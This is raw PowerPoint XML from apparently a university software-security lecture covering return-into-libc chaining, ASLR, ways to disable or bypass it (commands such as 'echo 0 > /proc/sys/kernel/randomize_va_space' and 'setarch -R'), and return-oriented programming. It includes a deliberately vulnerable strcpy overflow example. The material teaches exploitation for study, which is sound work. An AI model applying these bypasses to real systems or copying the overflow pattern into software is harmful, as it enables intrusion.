          <p:cNvPr id="19" name="Rectangle 18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="479672" y="1765141"/>
            <a:ext cx="2831284" cy="93025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 * 50</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4738838" y="4486372"/>
            <a:ext cx="6256324" cy="1476243"/>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system</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sub $0x8,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0x10(%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>esp</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eax</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pP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0xb7e66310</a:t>
            </a:r>
            <a:endParaRPr lang="is-I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0xb7e66311</a:t>
            </a:r>
            <a:endParaRPr lang="is-I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0xb7e66314</a:t>
            </a:r>
            <a:endParaRPr lang="is-IS" sz="1800" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="is-IS" sz="1800" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Right Arrow 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4383301" y="485149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2" name="Rectangle 21"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="479670" y="678050"/>
            <a:ext cx="2831284" cy="340919"/>
          </a:xfrm>
          <a:prstGeom prst="rect">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479670" y="305617"/>
            <a:ext cx="2831284" cy="340919"/>
          </a:xfrm>
          <a:prstGeom prst="rect">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102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chaining</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Where we put '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>edcb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>' will be the next place to execute after system</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Doing so, we can chain multiple function calls</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>But, we must be careful of how the stack looks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">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FCFB7E3C-6220-8942-988C-3F6E25750AD7}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>341</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="59845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Address Space Layout Randomization</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="77500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Randomizes the position of the heap, the stack, the program’s code, and the dynamically-linked libraries</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Library random positioning requires position-independent code (or if this is not possible, some run-time overhead to handle the mapping of references)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Makes return-into-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>libc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> attack much harder, as the location of the library code has to be guessed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Depending on the implementation, libraries are randomized with 16 bits of entropy on 32-bit architectures (requires, in average 32K attempts)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Still vulnerable to brute-force attack, if unlimited attempts are possible</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>64-bit architectures are much more secure</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8458200" y="5657850"/>
            <a:ext cx="685800" cy="342900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{BD5F6748-727B-F942-A49F-96C7BB40957B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>342</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="39000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ASLR in Linux</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>ASLR is enabled in Linux by default</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>proc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/sys/kernel/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>randomize_va_space</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>It is implemented by the kernel in collaboration with the ELF loader</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Stack ASLR</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Libs/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> ASLR</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Exec ASLR (Requires </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>executables</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> in PIE format)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>More resilient to ROP attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Brk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> ASLR</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>VDSO ASLR </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62985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Exploitation under ASLR</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>ASLR can be disabled by:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Setting the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>asociated</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> kernel variable to 0</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>echo “0” &gt; /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>proc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/sys/kernel/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>randomize_va_space</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>setarch</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>setarch</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> `</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>uname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> -m` -R /bin/bash </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>ASLR can be defeated by brute-forcing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If it is possible to limit the variation space</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Attacks can be structured in two steps:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Address leaking (e.g., through a format string attack)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Control flow hijacking</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="109777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Return-Oriented Programming</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The return-into-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>libc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> approach can be generalized</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Instead of invoking whole functions, one can invoke just a snippet of code, followed by ret instruction</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This technique was first introduced in 2005 to work around 64-bit architectures that require parameters to be passed using registers (the “borrowed chunks” technique, by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Krahmer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Slide Number Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8458200" y="5657850"/>
            <a:ext cx="685800" cy="342900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{0C48C68F-D55B-E346-9895-9FEE0C87EFA0}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>345</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="120471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Return-Oriented Programming</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Later, the most general ROP technique was proposed, which supports loops and conditionals</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>From: “The Geometry of Innocent Flesh on the Bone: Return-into-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>libc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> without Function Calls (on the x86)”, by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Hovav</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Shacham</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Our thesis: In any sufficiently large body of x86 executable code there will exist sufficiently many useful code sequences that an attacker who controls the stack will be able, by means of the return-into-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>libc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> techniques we introduce, to cause the exploited program to undertake arbitrary computation. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Slide Number Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8458200" y="5657850"/>
            <a:ext cx="685800" cy="342900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{0C48C68F-D55B-E346-9895-9FEE0C87EFA0}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>346</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="120430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953" y="305134"/>
            <a:ext cx="4840977" cy="4525963"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>#include &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>string.h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> main(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>argc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>, char** </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>{   </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>char </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>foo [50];   </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>(foo, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>[1]);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>return</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> 10;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
